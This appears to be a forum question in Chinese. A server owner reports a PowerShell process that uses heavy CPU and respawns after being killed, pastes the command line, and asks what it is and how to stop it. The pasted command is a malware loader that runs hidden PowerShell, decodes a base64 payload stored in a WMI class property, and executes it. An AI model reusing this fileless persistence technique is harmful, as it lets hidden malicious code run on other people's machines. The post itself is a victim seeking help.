我最近遇到了这个问题:
我的服务器变得非常慢,我去检查发现一个 PowerShell 实例占用了大量 CPU。我强制结束任务,几个小时后它又恢复了。
正在执行的脚本:
powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList ($mon, $mon, 'Void', 0, '', '')"
有人知道这是什么以及如何阻止它被执行吗?